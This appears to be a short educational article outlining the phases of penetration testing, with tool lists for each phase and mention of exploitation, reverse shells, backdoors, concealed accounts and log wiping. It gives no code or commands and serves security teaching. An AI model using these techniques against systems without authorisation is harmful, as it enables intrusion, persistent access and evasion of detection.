methodology - phases of penetration testing

---

Reconnaissance is the first step in ethical hacking. It’s often  referred to as foot printing. Here, a hacker tries collecting various  kinds of data, such as employee information, IP addresses, network  topology, and domain names, using active and passive approaches. The  purpose is to create a diagram of the target’s digital and physical  assets.

Active Reconnaissance: This method involves direct interaction with the target system, which may warn the target about possible scans.

Passive Reconnaissance: This implies collecting data without direct contact with the target, making it untraceable.

Popular Tools & Techniques Used are:

• Nmap
• Whois
• Dig
• Nslookup
• DNS Enumeration
• Google Dorking

At that point, the hacker goes to the scanning stage after having  enough information. Scanning recognizes open ports, active devices, and  services in the targeted network. It also helps to identify areas of  vulnerability that can be targeted. Scanning is usually divided into  three categories:

• Port Scanning: Finding open ports or services with Nmap or Angry IP Scanner.
• Vulnerability Scanning: Detecting known weaknesses in systems and applications using Nessus.
• Network Mapping: Creating a blueprint of network topology with tools such as SolarWinds.

Popular Tools & Techniques Used are:

• Nessus
• OpenVAS
• Nikto
• ZAProxy
• Banner Grabbing

During this crucial stage, the intruder utilizes the weaknesses  identified during scanning for unauthorized entry into the target  system. This may involve leveraging applications, operating systems, or  network flaws. The objective is establishing access at different  privilege levels, from user accounts to administrative control.

Exploitation Methods comprise buffer overflows, SQL injection, and cross-site scripting (XSS).

Popular Tools & Techniques Used are:

• Metasploit
• SQLmap
• Hydra
• CrackMapExec
• BurpSuite
• Hashcat
• Webshells
• Misconfigurations
• John The Ripper
• Public Exploits

Once inside, the intruder must maintain a presence on the target  machine for further actions such as gathering or monitoring sensitive  data. Therefore, Backdoors, Rootkits, or Trojan horses can be installed  at this point to ensure continued access to the device even after it has  been rebooted or patched.

Persistence Techniques: Employing malicious programs, establishing concealed user accounts, or exploiting cron jobs.

Popular Tools & Techniques Used are:

• Netcat
• User Creation
• Service highjacking
• Privilege Escalation
• Reverse Shells
• Payloads & Cronjobs
• Tunneling

The finale of ethical hacking revolves around ensuring the hacker  remains under the radar. This implies wiping logs, concealing files, and  manipulating timestamps to eliminate evidence or proof of any attack.  The intention is to ensure that attackers can never be detected or  traced via their attack methodology.

Popular Tools & Techniques Used are:

• History deletion
• Backdoors removal
• Logs clearance
• Created Users deactivation
• Created Groups deactivation